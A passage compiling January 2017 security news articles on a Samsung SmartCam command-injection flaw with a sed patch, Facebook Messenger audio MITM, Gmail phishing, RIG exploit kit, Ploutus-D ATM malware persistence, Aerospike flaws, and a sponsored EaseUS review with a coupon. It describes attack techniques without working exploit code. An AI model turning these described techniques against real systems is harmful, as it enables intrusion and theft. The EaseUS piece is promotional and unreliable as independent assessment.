The researcher focused their analysis on the Samsung branded indoor IP camera SNH-6410BN, they noticed for example that the device still has SSH and a web server running on it, potentially open doors for hackers.

Samsung decided to solve the issue by disabling SSH and local access to the web interface. Actually, users can access the Samsung SmartCam via the SmartCloud online service.

Researchers Exploitee.rs conducted a new test session on the device and discovered a way to enable the Telnet service and the local web interface by exploiting a command injection flaw in a collection of scripts that were not removed by the vendor.

“Today we’re re-visiting a device that we’ve hacked in a previous session. At DEFCON 22, we released exploits for the Samsung Smartcam network camera in our “Hack All The things” presentation. These exploits allowed for remote command execution and the ability to arbitrarily change the camera’s administrator password.” states the analysis published Exploitee.rs.

These scripts exploited by the hackers are related to the iWatch webcam monitoring service and are used for firmware update functionality. The researchers discovered an iWatch Install.php root command execution issue.

“The iWatch Install.php vulnerability can be exploited by crafting a special filename which is then stored within a tar command passed to a php system() call,” researchers explained. “Because the web-server runs as root, the filename is user supplied, and the input is used without sanitization, we are able to inject our own commands within to achieve root remote command execution.”

Researchers at Exploitee.rs have also released a proof-of-concept (PoC) code for the vulnerability, and a fix. The exploit works with the SNH-1011 model, but researchers believe all Samsung SmartCam devices are affected.

“The vulnerability can be patched by first logging in to the server after spawning a shell with the POC curl command above, then running the following command.”

sed -i -e 's/" . $file . "/" . escapeshellarg($file) . "/' /mnt/custom/iwatch/web/install.php
Researchers have warned that enabling the web interface reintroduces some of the older vulnerabilities previously discovered.

How To Stop Larry From Hacking Your WiFi in 2017
17.1.2017 thehackernews Hacking
It’s 2017, and we’re not any further along with Wi-Fi security than we were 10 years ago. There are Intrusion Detection Systems and 2nd generation antivirus apps to protect us from some vulnerabilities but the simple fact that some people and businesses still don’t set their network up well in the first place.
Installing WiFi is like running Ethernet to your parking lot. It’s a cliche thing to say, but it is often true.
If I can attack your network sitting in my car from the parking lot, what chance do you have? And 99% of the time I’m successful.

Lots of companies are moving to new offices that have wide open office layouts. Some may not have BYOD policies or wireless security plans in place, and anyone can bring their own device to work that you may not know about.
I’ve even seen some companies installing IoT devices like smart led light bulbs and thermostats. Even some security camera systems which are always running unsecured and default passwords.
So what can you do to protect people like me from exploiting weaknesses in your wireless security networks and PWNing your company?
Pwnie Express @PwnieExpress
We're sorry, but your new password must contain an upper case letter, a number, a punctuation mark and a gang sign 😳🤔
7:56 PM - 16 Jan 2017
10 10 Retweets 15 15 likes
Be sure WEP does not exist in your infrastructure. WEP is the weakest of the weak for encryption but was a reaction to open networks early on.If enough packets are observed the key can be brute forced easily. Remember doing that like 15 years ago?
WPA/WPA2 PSK can be your friend. It’s mostly secure, but there are still things you need to lock down to be sure.
Create a plan on what to do when an attack happens. Develop and implement a wireless security policy. Be ready when you do detect a rogue device or when someone’s banging on your network from the parking lot.

Want to watch us talk about penetration testing and hear stories from 200 clients I’ve been hired to hack into their network?
We’re running a webinar tomorrow with Pwnie Express and Larry Pesce.
You can sign up here, and I’ll send you the link to watch us as well as a guide for 2017 on how you can lock down wireless networks and keep people like me out of your company's networks.

How EaseUS Partition Master Can Easily Manage Your Hard Disk
17.1.2017 thehackernews IT
If you want to get the most out of your computer, you need to get the most out of your hard drive, where all your data is stored.
Today hard drives are larger than ever, so it makes sense for you to partition your hard disk to effectively use all of its space and manage all your important information.
Partitioning is also useful if you intend to install and use more than one operating system on the same computer.
There is a vast business of partition manager software out there, and today we are reviewing one of the most popular partition management tools available in the market: EaseUS Partition Master Professional.
EaseUS Partition Master Professional offers you the complete package with capabilities for organizing and resizing your drive, restoring and backing up your information, improving system performance, installing and managing several operating systems on the same computer, along with recovering and cloning data files.
Let's dig deep into the capabilities provided by the EaseUS Partition Master Professional software.
Resize, Move Or Merge Multiple Partitions

You might have, at some point, obsessed with low space in one certain partition of your hard disk while others may be left unused for long with much space. At this point, you can choose to merge two partitions for a larger system partition.

But resizing or combining your system and boot partition C drive, which holds your Operating System, without any third party tool is not always a good idea, as there are chances of data loss.
So, in that case, users are always advised to use a third-party partition tool from a reputable and trustworthy company.
EaseUS partition software can get this job done with ease.
EaseUS Partition Master Professional provides one-click, easy-to-use interface to help you move, resize, merge, hide or unhide the existing disk partitions without damaging even a single bit of original data.
All you need to do is launch the EaseUS Partition Master Professional software, choose the disk partition you want to process and right click on it, and you’ll get the list of all the available operations that can be performed.
Once you resize or move your partitions, you are advised to backup your data.
Migrate OS to SSD/HDD Without Reinstalling Windows

One of the major features of EaseUs Partition Master Professional is the ability to migrate your operating system to another hard drive (SSD or HDD).
So, if you are upgrading your old PC for better performance, this tool also allows you to transfer all your data on system and boot partitions, including OS and installed applications, without reinstalling the operating system on the new drive.
To migrate your OS from HDD to SSD, all you need to do is launch the application, click on Wizard and then select 'Migrate OS to SSD/HDD' from the main menu. Now select SSD as destination disk, delete partitions on the target drive, resize partitions on the target disk, and then click Finish.
Moreover, it also supports MBR and GPT disks
Bootable Partition Manager (CD/DVD/USB)

The tool also enables users to manage hard disk partitions even when their OS fails to boot or manage partitions without an operating system.
Also, users who are looking for a bootable USB flash drive partition manager that will be able to resize partitions, EaseUS Partition Master is your pick.

To create a bootable USB flash drive partition manager, you first need to download and launch EaseUS Partition Master, then select Tool → Create WinPE bootable disk → USB and then start to create a USB bootable disk of EaseUS Partition Master.
After that, you can launch EaseUS Partition Master from bootable USB device or CD/DVD and manage your hard drive partitions.
Copy/Clone Partition

If ransomware malware strikes, only a good backup can save your files and money, and EaseUS Partition Master helps you do just that.
The Partition Copy and Disk Copy features integrated into EaseUS Partition Master are specially designed to provide protection from data loss.
The Partition Copy feature aims to backup your partitions before the partition operations applied to the hard disk to prevent any data loss from program error or some other accidental errors.
Partition Copy let you copy a partition to unallocated space on your hard disk, and even allow you to resize the unallocated space during the procedure if necessary.
On the other hand, Disk Copy lets you not only make a backup copy of your hard drive but also allows you to copy your entire system from a small hard disk to a larger hard drive.
Securely Erase Data on SSD or HDD

If you've just got a new PC and want to sell your old one, make sure all your data has been cleared securely and can not be recovered anyhow.
Because, when you delete a file, it is not deleted. Those deleted files still exist. Your PC only removes the file indexing information from the hard drive.
So, if that deleted data is not overwritten, it can be recovered later, which may include your passwords, private photographs, personal information, classified documents or financial records.
So, always be sure to securely erase your data before selling or throwing away your device.
Using EaseUS Partition Master, you can securely delete your files or entire drive in a way that it can not be recover anyhow.
To do so, first, launch EaseUS Partition Master Free, select the SSD or hard disk you want to erase, and then right click and select "Wipe disk."
The tool will then ask you to set the number of times (1-10 times) to wipe your hard drive and click "OK." A dialog box will appear saying your PC will computer restart after disk erase. Just click "OK" and then click "Apply" to securely erase SSD or HDD.
Note: If you are erasing your entire hard disk, make sure that it does not include system partition because your system will not boot after wiping the drive.
Support and Compatibility (OS, File System, Drive Type)
The free version of EaseUS Partition Master supports up to 8TB hard disks while the professional version supports up to 16TB disks and 32 disks at most.
Talking about the operating system, EaseUS Partition Master supports Windows 10, 8.1, 8 and 7 SP1, and 32-bit and 64-bit versions of Windows 7, Vista and Windows XP Home Edition and Professional.
EaseUS Partition Master supports MBR and GPT disks – GPT disks are faster than MBR and help with high-capacity hard disk drives. So if you want to convert your regular MBR hard disk drive into GPT, you can use EaseUs that'll do it without any data loss.
EaseUS Partition Master is supportive over different file systems as well, including EXT3, EXT2, NTFS, FAT32, FAT16, FAT12, and ReFS. It also supports different device types including Solid-State Drive (SSD), IEEE 1394 (FireWire) HDD, USB 1.0/2.0/3.0 HDD, all levels of SCSI, IDE and SATA RAID controllers, full support of RAIDed configurations (hardware RAIDs) and removable devices, like flash drive, memory card, and more.
EaseUs is one of the top disk management software developers out there, and its Partition Master Professional software stands up to its name.
Conclusion: EaseUs Partition Master Professional is a complete solution for managing, copying and recovering your disk partitions within only a few simple clicks. A large number of superb partitioning and solid additional features as well as the user-friendly interface place EaseUS Partition Master near the top and make it difficult to beat.
So, if you are looking for an effective partition manager, you should give it a try, as its worth its every single penny.
EaseUS Partition Master Professional Edition costs just $39.95, while its Server Edition costs $159.00 and Home Edition is free. You can also take a Free Trial of EaseUS Partition Master Professional Edition.
If this partition tool really met all your requirements, you can purchase EaseUS Partition Master Pro at highly discounted price at The Hacker News. We are giving 50% discount on EaseUS Partition Master Pro to our readers.
Just use SEO-LGR-85D coupon code at the time of checkout.

Simple Hack Lets Hackers Listen to Your Facebook Voice Messages Sent Over Chat
17.1.2017 thehackernews
Most people hate typing long messages while chatting on messaging apps, but thanks to voice recording feature provided by WhatsApp and Facebook Messenger, which makes it much easier for users to send longer messages that generally includes a lot of typing effort.
If you too have a habit of sending audio clip, instead of typing long messages, to your friends over Facebook Messenger, you are susceptible to a simple man-in-the-middle (MITM) attack that could leak your private audio clips to the attackers.
What's more worrisome is that the issue is still not patched by the social media giant.

Egyptian security researcher Mohamed A. Baset told The Hacker News about a flaw in Facebook Messenger's audio clip recording feature that could allegedly allow any man-in-the-middle attacker to grab your audio clip files from Facebook's server and listen to your personal voice messages.
Let's understand how this new attack works.
Here's How Attackers can Listen to your Personal Audio Clips:

Whenever you record an audio clip (video message) to send it to your friend, the clip gets uploaded onto the Facebook's CDN server (i.e., https://z-1-cdn.fbsbx.com/...), from where it serves the same audio file, over HTTPS, to both the sender as well as the receiver.
Now, any attacker sitting on your network, running MITM attack with SSL Strip, can actually extract absolute links (including secret authentication token embedded in the URL) to all audio files exchanged between sender and receiver during that process.
Then, the attacker downgrades those absolute links from HTTPS to HTTP, allowing the attacker to direct download those audio files without any authentication.
That's it.

You might be wondering that how hackers are able to download your audio files so easily.
What went Wrong?
This is because Facebook CDN server does not impose HTTP Strict Transport Security (HSTS) policy that forces browsers or user agents to communicate with servers only through HTTPS connections, and helps websites to protect against protocol downgrade attacks.
Secondly, the lack of proper authentication — If a file has been shared between two Facebook users it should not be accessible by anyone except them, even if someone has the absolute URL to their file, which also includes a secret token to access that file.
As an example, Mohamed sent an audio clip to one of his friends over Facebook Messenger and here's the absolute link to the audio file extracted using MITM attack, which anyone can download from Facebook's server, even you, without any authentication.
"GET requests are something that the browsers can remember it in its cache also in its history, Better to have this files played via POST requests with an anti-CSRF token implemented," Mohamed told The Hacker News.
Still Unpatched; No Bug Bounty!
Mohamed reported the issue to Facebook, and the company acknowledged it, but haven't patched it yet. Facebook did not offer any bug bounty to the researcher, as the downgrade attacks do not come under its bug bounty program.


Here's what the Facebook security team told Mohamed:
"We are in the process of rolling out HSTS across various facebook.com subdomains. The fact that we have not rolled it out on particular subdomains does not constitute a valid report under our program."
"In general, sending in reports that claim we should be using defense-in-depth mechanisms like HSTS will not qualify under our program. We make very deliberate decisions about when we roll out (or not) particular protections and so reports suggesting that we make changes there generally do not qualify."
You can watch the above proof-of-concept video demonstration, which shows this attack in action.
We have contacted Facebook security team for the comment and will update the story as soon as we hear from the company.

Russian Channel One alleged hacked and BBC Sherlock Final Leaked
17.1.2017 securityaffairs Hacking
On Monday, Russian State Television Channel One leaked online the BBC Sherlock Final episode, the broadcaster blames hackers.
On Monday, a Russian state television Channel One blamed hackers for the leak online of the final episode of the BBC drama Sherlock a day before its actual planning.

The Russian Channel One was set to transmit the end-of-season episode of the fourth series of Sherlock the detective on Monday just after midnight Moscow time (2100 GMT), simultaneously with the UK.

“The BBC is trying to establish whether an episode of Sherlock was deliberately leaked from within the offices of a Russian state broadcaster, after last night’s hotly-anticipated series finale was circulated on the internet ahead of transmission.” Reported The Telegraph.

“A Russian-language version of the 90-minute episode, entitled The Final Problem, appeared online on Saturday, featuring a three-second continuity announcement identifying it as having originated from Channel One, which holds the rights to air Sherlock in Russia.”

According to the Russian broadcaster, hackers broke into its system and leaked online a full episode professionally dubbed into the Russian language. Of course, copies of the final episode of the BBC drama Sherlock appeared across numerous sites.

“According to preliminary findings, the cause was a hacker attack,” Channel One spokeswoman Larisa Krymova revealed to the AFP.

[the channel] “has been in close contact with the BBC from the moment it learnt of the leak and is carrying out an investigation to identify the source of the material uploaded onto the Internet.”

[Channel One]” will be ready to share full information on the incident with colleagues after the investigation is completed,” explained the Channel One spokeswoman.

The BBC confirmed it had launched an investigation on the case.

“We have brought everything up to beyond gold standard, which is why things like this are so surprising. This is more than an accident.” stated a source at the corporation.

“BBC Worldwide takes breaches of our stringent content security protocols very seriously and we have initiated a full investigation into how this leak has occurred.” said a BBC spokesman.

The show’s producer Sue Vertue invited Sherlock fans to avoid sharing the illegal copy of the final episode.

sue vertue ✔ @suevertue
Russian version of #Sherlock TFP has been illegally uploaded.Please don't share it. You've done so well keeping it spoiler free.Nearly there
4:54 PM - 14 Jan 2017
1,999 1,999 Retweets 3,934 3,934 likes
Analysts believe that the attack was politically motivated, the attack can be considered a Russia’s retaliation against the BBC.

“There appears to be no profit motive, no benefit to the broadcaster from doing this. What remains is a political motive. The most obvious explanation is that this is punitive.” explained Ben Nimmo, information fellowdefence at the Atlantic Council think tank.

Court Documents Reveal How Feds Spied On Connected Cars For 15 Years
16.1.2017 thehackernews Crime
It's not always necessary to break into your computer or smartphone to spy on you. Today all are day-to-day devices are becoming more connected to networks than ever to add convenience and ease to daily activities.
But here's what we forget: These connected devices can be turned against us because we are giving companies, hackers, and law enforcement a large number of entry points to break into our network.
These connected devices can also be a great boon for law enforcement that can listen and track us everywhere.
Let's take the recent example of 2016 Arkansas murder case where Amazon was asked to hand over audio recordings from a suspect's Echo.
However, that was not the first case where feds asked any company to hand over data from a suspect's connected device, as they have long retrieved such information from connected cars.
According to court documents obtained by Forbes, United States federal agencies have a 15-year history of "Cartapping" — where vehicle tech providers are ordered to hand over almost real-time audio and location data from a user.
How Police Have Spied On Connected-Cars For Years?
Example? In 2014, satellite radio and telematics provider SiriusXM provided location information of a Toyota 4-Runner following a warrant by New York police, which was recently unsealed.
The warrant asked SiriusXM "to activate and monitor as a tracking device the SIRIUS XM Satellite Radio installed on the Target Vehicle" for ten days, and the company admitted to Forbes that it complied with the order.
How did SiriusXM achieve this? The company simply turned on the stolen vehicle recovery feature of its Connected Vehicle Services technology on the target vehicle, Toyota 4-Runner. It's like Apple turning on the Find My iPhone feature to track a customer's location, the court documents [PDF] says.
SiriusXM said it worked with law enforcement periodically to provide such information on its customers with just a valid warrant. The company receives an estimated five valid court orders a year to monitor a suspect, though it declined to offer on-record comment.
SiriusXM is not alone. General Motors (GM) had repeatedly worked with federal agencies to provide not just location but also audio through its OnStar service, where people conversations are recorded when the in-car cellular connection is turned on.
According to Forbes, police asked GM to hand over OnStar data in December 2009 from a Chevrolet Tahoe rented by suspected crack cocaine dealer Riley Dantzler.
OnStar's tracking is so accurate that even after the feds had no idea about Dantzler's car, it's able to "identify that vehicle among the many that were on Interstate 20 that evening," followed him from Houston, Texas, to Ouachita Parish, stopped Dantzler and found cocaine, ecstasy and a gun inside the car.
The defense lawyer argued that the court order compelling OnStar to hand over data was made in Louisiana, but since the tracking started in Texas, it went beyond the court jurisdiction.
In a separate case in 2007, OnStar was ordered to track and continuously reveal the physical location of GMC Envoy SUV of suspected heroin dealer Lamauro Coleman as he traveled around Michigan. When he was stopped, the feds found 43 grams of heroin.
Here's what Coleman's representation argued:
"The statute is silent as to the authority of the government to use a 3rd party product in [place] of physically installing a device of their own."
"Allowing this type of intrusion is a leap the court shouldn't be willing to make. Authorizing OnStar agents to activate the system within a suspect's car renders statutory authority null. It effectively makes every single General Motors vehicle and every OnStar service representative an agent of the government."
When talking about audio data, OnStar competitor ATX Technologies in 2001 was also ordered to provide "roving interceptions" data of a Mercedes Benz S430V. ATX complied with the order in November and spied on audible communications for 30 days, but declined when the FBI asked for an extension in December, the court documents [PDF] revealed.
In 2007, OnStar was ordered to provide audio data from a Chevrolet Tahoe belonging to Gareth Wilson in Ohio.
An emergency button in Wilson's car was automatically pushed without his knowledge, which allowed an officer from the Office of the Fairfield County Sheriff to listen to the conversation about a possible drug deal, reads a 2008 opinion from the case.
After that, when the feds located and searched the car, they found marijuana. Later it turns out that Wilson had not even signed up to the OnStar service, but the service had not been switched off.
Wilson later argued that snooping on his conversations and the subsequent search of his vehicle were illegal, which violated Ohio's wiretapping and electronic surveillance law.
PRIVACY is just a Word!
In all cases, "attempts to have the evidence thrown out foundered. The government was able to argue that as a warrant was signed off, there was no longer an expectation of privacy," Forbes writes.
Here's the statement provided by a GM spokesperson:
"We don't monitor or otherwise track the location of OnStar-equipped cars unless required by a valid court order in criminal procedures or under exigent circumstances; and we don't release the number of those requests. We take our customers' privacy, safety, and security very seriously, and we assist them on average more than 600 times each month in North America with some form of Stolen Vehicle Assistance."
According to American Civil Liberties Union (ACLU) legislative counsel Neema Singh Guliani, such cases of connected car monitoring are part of the growing trend towards government and law enforcement access to internet-enabled tech.
"Fundamentally, what's happening is the technology is moving at warp speed, and there are more and more ways to get information on people, about their personal activities, but you have the law standing utterly still," Guliani told the publication.
"What's often happening the police are trying to massage laws that were written at the time, in some cases when we didn’t even have the internet or the concept of a telephone, or GPS, and massage them to fit these modern technologies."
So, fuck privacy! When you have a good enough car to be internet connected, always expect to be followed everywhere.
The broader takeaway: Internet-connected devices automating your day-to-day habits could be, at some point, used for or against you, legally.

Insidious phishing attack leverages on fake attachments to steal Gmail credentials
16.1.2017 securityaffairs

Cybercriminals are adopting specially crafted URLs to trick users into entering their Gmail credentials in a new sophisticated phishing campaign.
Security experts discovered a new effective Gmail phishing attack that is able to deceive also tech-savvy people. Crooks leverage on specially crafted URLs to trick victims into providing their Gmail credentials on a phishing page.

The malicious messages are sent from one of the victim’s contacts and pretend to carry a PDF document that can be previewed directly from Gmail. When the victim clicks on the “attachment” image included in the body of the message it is redirected to a Gmail phishing page.

The URL to which the images of attachments point is crafted to appear legitimate:


The web browser does not display any certificate warning, experts noticed that the apparently legitimate part of the URL is followed by white spaces, which prevent the victims from seeing suspicious strings and an obfuscated script that opens a Gmail phishing page in a new tab. A technical description of the Chrome/Gmail attack has been published on Github.

Gmail phishing

“You click on the image, expecting Gmail to give you a preview of the attachment. Instead, a new tab opens up and you are prompted by Gmail to sign in again. You glance at the location bar and you see accounts.google.com in there. It looks like this….” states a blog post published by WordFence. “Once you complete sign-in, your account has been compromised.”

This technique is not new, several victims reported similar attacks in July.

One of the main characteristics of the attacks that have been recently detected by the experts is that crooks immediately accessed the compromised accounts and used them to send out phishing emails to all the victim’s contacts. It is still unclear if the attackers have found a way to automate the process.

View image on Twitter
View image on Twitter
Tom Scott ✔ @tomscott
This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy…
12:54 PM - 23 Dec 2016
6,132 6,132 Retweets 5,310 5,310 likes
As usual, let me suggest to enable two-factor authentication (2FA) on Gmail in order to avoid being victims of this powerful phishing scheme. However, if the cyber criminals immediately access the compromised account they could also include in a phishing page the 2FA code.

“2FA would make it harder to exploit, but phishing attacks are getting fancier. They capture the 2FA code you enter and immediately start a session elsewhere with your password and 2FA. Hardware 2FA, a security key, (such as a Yubikey) is the only likely way to prevent phishing (excluding targets of state actors)” wrote a user in a discussion on Hacker News.

Google has been aware of this new phishing tactic at least March 2016, for this reason, the Chrome security team suggested introducing a “Not Secure” tag in the address bar for data:, blob: and other URLs that may be exploited by phishers in hacking campaigns.

Weak passwords are still the root cause of data breaches

16.1.2017 securityaffairs Hacking

Key findings of a new study conducted by Keeper Security that analyzed 10 million hacked accounts from breached data dumps for the most popular passwords.
Users’ bad habits are still one of the biggest problems for the IT industry, weak passwords and their reuse on multiple websites every day potentially expose a billion users to cyber attacks.

I’m not surprised by the results of a new study conducted by the security firm Keeper Security that analyzed 10 million hacked accounts from breached data dumps for the most popular passwords.

Below the Top 10 Keeper Security’s 2016 most popular password list:

Most used passwords continue to be 123456 and 123456789 despite the numerous awareness campaigns on a proper security posture, “123456” accounts for 17 per cent of the overall amount of hacked accounts the firm used as data sample.

“Looking at the list of 2016’s most common passwords, we couldn’t stop shaking our heads. Nearly 17 percent of users are safeguarding their accounts with “123456.” What really perplexed us is that so many website operators are not enforcing password security best practices.” states the report published by Keeper Security. “We scoured 10 million passwords that became public through data breaches that happened in 2016.”

The bad news is that the list of most popular passwords hasn’t changed over the years.

“The list of most frequently used passwords has changed little over the past few years. That means that user education has limits.” continues the study.

This aspect highlights the lack of a security policy that contemplates also the use of strong passwords and enforces it. Four of the top 10 passwords on the list are composed of just six characters or shorter, it’s very easy to brute force them it the system is not properly protected.

“today’s brute-force cracking software and hardware can unscramble those passwords in seconds. Website operators that permit such flimsy protection are either reckless or lazy.”

The list also includes passwords like “1q2w3e4r” and “123qwe,” it is likely that some users attempt to use unpredictable patterns to generate strong passwords. Unfortunately dictionary-based password crackers include these variations.

The last point emerged from the report is that email providers don’t correcly monitor the use of their services made by botnet used for spam.

“Security expert Graham Cluley believes that the presence of seemingly random passwords such as “18atcskd2w” and “3rjs1la7qe” on the list indicates that bots use these codes over and over when they set up dummy accounts on public email services for spam and phishing attacks.” states the report.


Intelligence report claims the Kremlin has cracked Telegram service
16.1.2017 securityaffairs
A raw intelligence document published last week claims Russian cyber experts have cracked Telegram messaging service to spy on opponents.
A raw intelligence document published last week contains much information about President Donald Trump and the approach of the Kremlin to the cyber espionage.

According to the report, the Russian Federal Security Service (FSB) offers bribes for back doors into commercial products, it uses to recruit black hat hackers in every way, including blackmail and coercion. The document reports the FSB used the sale of cheap PC game containing malware to compromise the machines. The report also reveals that the Russian Intelligence has cracked the popular Telegram instant messaging service.

The intelligence report has been prepared by a former British agent, he received the information about the hack of the Telegram service by a “cyber operative.”

“His/her understanding was that the FSB now successfully had cracked this communication software and therefore it was no longer secure to use,” reads the document.

Telegram was used by opponents of the government, for this FSB decided to crack it.Telegram is the work of two Russian brothers and billionaires, Nikolai and Pavel Durov. They had previously created Vkontakte – an alternative to Facebook. However, they got in trouble over some Ukrainian personal data issue and fled to Berlin from Russia in 2014.

Telegram leverages on a custom encryption process it made up itself for this reason security experts and privacy advocates raised several times questions about its security.

When it comes to cyberattacks, Russia’s offensive tactics include targeting foreign governments, especially Western governments; penetrating foreign corporations, especially banks; monitoring of the domestic elite; and attacking political opponents inside Russia and abroad.

According to the cyber spy, the Russian government received the support of an IT staffer at Telegram.


The Russian intelligence in one circumstance compromised some IT gear used by a foreign director of a Russian state-owned enterprise in order to conduct cyber espionage on Western organizations via backdoor.

The FSB offered a U.S. citizen of Russian descent funding for an IT startup in exchange for a backdoor into the software developed by the company. In this way, Russian cyber spies could deliver a malware to launch targeted attacks.

The intelligence document doesn’t provide further details on the cyber operations conducted by Russian hackers.

It is interesting as obvious the interest for the representatives of the G7 governments and NATO.

“External targets include foreign governments and big corporations, especially banks,” the document says, but mainly succeeds only among lower level targets. It says it has “limited success in attacking top foreign targets like G7 governments, security services and but much more on second tier ones through IT back doors, using corporate and other visitors to Russia.”

In order to target G7 governments, nation-state actors hit second-tier organizations, including western private banks and the governments of smaller states that are allied with the Western states.

“Hundreds of agents, either consciously cooperating with the FSB or whose personal and professional IT systems had even unwittingly compromised, were recruited,” continues the document.

The Russian institutions also suffer the cyber attacks of multiple cyber gangs, including Carbanak, Buktrap and Metel.

“The Central Bank of Russia claimed that in 2015 alone there had been more than 20 attempts at serious cyber embezzlement of money from corresponding accounts held there, comprising several billions of Rubles,” continues the report.

New campaign leverages RIG Exploit kit to deliver the Cerber Ransomware
16.1.2017 securityaffairs
Experts from Heimdal Security warned of a spike in cyber attacks leveraging the popular RIG Exploit kit to deliver the Cerber Ransomware.
The RIG exploit kit is even more popular in the criminal ecosystem, a few days ago security experts at Heimdal Security warned of a spike in cyber attacks leveraging the popular Neutrino and RIG EKs.

Now security experts from Heimdal Security are warning of a new campaign leveraging the RIG exploit kit that targets outdated versions of popular applications to distribute the Cerber ransomware.

The attackers leverage an array of malicious domains to launch drive-by attacks against visitors trying to exploit flaws in outdated versions of popular applications such as Flash, Internet Explorer, or Microsoft Edge.

“At the moment, cybercriminals are using a swarm of malicious domains to launch drive-by attacks against unsuspecting users.” states the analysis published by Heimdal Security.

“The campaign works by injecting malicious scripts into insecure or compromised systems. Victims can get infected simply by browsing the compromised or infected websites, without clicking on anything. What exposes them to this attack are outdated versions of the following apps: Flash Player, Silverlight, Internet Explorer or Edge.”

The crooks compromise websites to inject malicious scripts that allow exploiting the flaws in the victim’s browser even without user interaction. reports.

RIG Exploit kit

This new campaign leverages on a RIG exploit kit that attempts to exploit the following 8 vulnerabilities:

According to the experts from Heimdal security, this variant of the RIG exploit is the Empire Pack version (RIG-E). Cyber criminals also abused domains that are part of the so-called Pseudo-Darkleech gateway that was also exploited by cyber gangs in June 2016 to deliver the CryptXXX ransomware in several campaigns leveraging on the Neutrino Exploit Kit.

It is important to highlight that the success of campaigns like this one is determined by the failure in applying security updates in popular software.

“As you can see, cybercriminals often use vulnerabilities already patched by the software developer in their attacks, because they know that most users fail to apply updates when they’re released. In spite of the wave of attacks, many Internet users still choose to ignore updates, but we hope that alerts such as this one will change their mind and make them more aware of the key security layer that updates represent.” states the report.

Ploutus-D, a new variant of Ploutus ATM malware spotted in the wild
15.1.17 securityaffairs

Security experts from FireEye have spotted a new variant of the infamous Ploutus ATM malware that infected systems in Latin America.
Ploutus is one of the sophisticated ATM malware that was first discovered in Mexico back in 2013. The threat allows crooks to steal cash from ATMs using either an external keyboard attached to the machine or by sending it SMS messages.

Experts at FireEye Labs have recently discovered a new version of the Ploutus ATM malware, dubbed Ploutus-D, that works the KAL’s Kalignite multivendor ATM platform.

The experts observed the Ploutus-D in attacks against ATM of the vendor Diebold, but the most worrisome aspect of the story is that minor changes to the malware code could allow Ploutus-D to target a wide range of ATM vendors in 80 countries.

Below the improved introduced in the Ploutus-D

It uses the Kalignite multivendor ATM Platform.
It could run on ATMs running the Windows 10, Windows 8, Windows 7 and XP operating systems.
It is configured to control Diebold ATMs.
It has a different GUI interface.
It comes with a Launcher that attempts to identify and kill security monitoring processes to avoid detection.
It uses a stronger .NET obfuscator called Reactor.
While similarities between Ploutus and Ploutus-D are:

The main purpose is to empty the ATM without requiring an ATM card.
The attacker must interact with the malware using an external keyboard attached to the ATM.
An activation code is generated by the attacker, which expires after 24 hours.
Both were created in .NET.
Can run as Windows Service or standalone application
The technical analysis revealed that developers improved obfuscation of the code by switching from .NET Confuser to Reactor.

The malware will add itself to the “Userinit” registry key to gain persistence, the key is located at:

\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

The attacker must interact with the Launcher by connecting a keyboard to the ATM USB or PS/2 port as illustrated in the following picture.


“Once the Launcher has been installed in the ATM, it will perform keyboard hooking in order to read the instructions from the attackers via the external keyboard. A combination of “F” keys will be used to request the action to execute” states the analysis.

The Launcher dropped legitimate files into the system, such as the KAL ATM, along with Ploutus-D. This action makes sure that all the software and versions needed to properly run the malware are present in the same folder to avoid any dependency issues.

The Ploutus-D could allow crooks to steal thousands of dollars in minutes reducing the risk to be caught while stealing the money under the CCTV.

“Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes.” states the analysis published by FireEye. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM. While there are some risks of the money mule being caught by cameras, the speed in which the operation is carried out minimizes the mule’s risk.”

In order to install the malware attackers likely have access to the targeted ATM software. The experts also speculate the crooks can buy physical ATMs from authorized resellers, which come preloaded with vendor software, or in the worst scenario they could steal the ATMs directly from the bank.

The analysis includes the main differences with previous versions and Indicators of Compromise (IOC) to use for the identification of the threat.

Talos Team discovered serious issues in Aerospike Database Server
15.1.17 securityaffairs

Security experts from Cisco Talos discovered several flaws in the Aerospike Database Server, a high-performance, and open source NoSQL database.
Security experts from Cisco Talos have discovered several vulnerabilities in the Aerospike Database Server, a high-performance, and open source NoSQL database.

It is used by several major brands for high-performance applications, including Kayak, AppNexus, Adform, adMarketplace and BlueKai.

The Cisco Talos team discovered that Aerospace Database Server, and likely earlier versions, is affected by three flaws that have been rated as critical and high severity, including remote code execution and information disclosure issues.

Talos has published technical details of the vulnerabilities in the advisories that also include proof-of-concept (PoC) code for them.

“Talos is disclosing multiple vulnerabilities discovered in the Aerospike Database Server. These vulnerabilities range from memory disclosure to potential remote code execution. This software is used by various companies that require a high performance NoSQL database. Aerospike fixed these issues in version 3.11.” reads the advisory published by the Talos Team.

TALOS-2016-0264 (CVE-2016-9050) – Aerospike Database Server Client Message Memory Disclosure Vulnerability
TALOS-2016-0266 (CVE-2016-9052) – Aerospike Database Server Index Name Code Execution Vulnerability
TALOS-2016-0268 (CVE-2016-9054) – Aerospike Database Server Set Name Code Execution Vulnerability.
Aerospike Database Server
The first security vulnerability, tracked as CVE-2016-9050, is an out-of-bounds read issue that affects the client message-parsing functionality. An attacker can exploit it by sending a specially crafted packet to the listening port which can result in memory disclosure or a denial-of-service (DoS) condition.

A second vulnerability, tracked as CVE-2016-9052, is an arbitrary code execution that affects a different function, namely “as_sindex__simatch_by_iname.”

The third one tracked as CVE-2016-9054, is a stack-based buffer overflow that resides in the querying functionality, specifically the “as_sindex__simatch_list_set_binid” function. It is quite simple to exploit, an attacker has to connect to the listening port to remotely execute arbitrary code via a specially crafted packet that triggers the vulnerability.

The flaws were reported to the Aerospike development team on December 23 and they addresses them on January 5 in version 3.11.0.

Talos has published advisories containing technical details and proof-of-concept (PoC) code for each of the vulnerabilities.

Student Faces 10 Years In Prison For Creating And Selling Limitless Keylogger
15.1.2017 thehackernews

A 21-year-old former Langley High School student, who won a Programmer of the Year Award in high school, pleaded guilty on Friday to charges of developing and selling custom key-logging malware that infected thousands of victims.
Zachary Shames from Virginia pleaded guilty in a federal district court and now faces a maximum penalty of up to 10 years in prison for his past deeds.
Shames was arrested this summer while he was working as a technical intern at Northrop Grumman, a security and defense government contractor, developing front-end site code and backend Java software and managing a MySQL database, according to what appears on his Linkedin page.
